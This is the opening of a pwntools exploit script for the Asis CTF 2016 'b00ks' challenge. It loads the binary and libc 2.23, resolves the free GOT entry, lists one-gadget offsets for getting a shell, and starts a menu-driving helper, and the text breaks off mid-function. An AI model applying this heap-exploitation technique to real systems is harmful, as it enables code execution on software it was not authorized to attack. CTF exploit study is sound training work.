Asis CTF 2016 b00ks
from pwn import *
arch = "amd64"
filename = "b00ks"
context(os="linux", arch=arch, log_level="debug")
content = 0
offset = 0
elf = ELF(filename)
menu_addr=0x0000000000000A89
free_got=elf.got['free']
libc=ELF("/lib/x86_64-linux-gnu/libc-2.23.so")
ogg_libc=[0x45226,0x4527a,0xf0364,0xf1207]
def create(size1,name,size2,desc):
io.recvuntil("> ")
io.sendline("1")
io.recvuntil("\nEnter book name size: ")
io.sendline(str(size1))
io.recvuntil("Enter book name (Max 32 chars): ")
io.sendline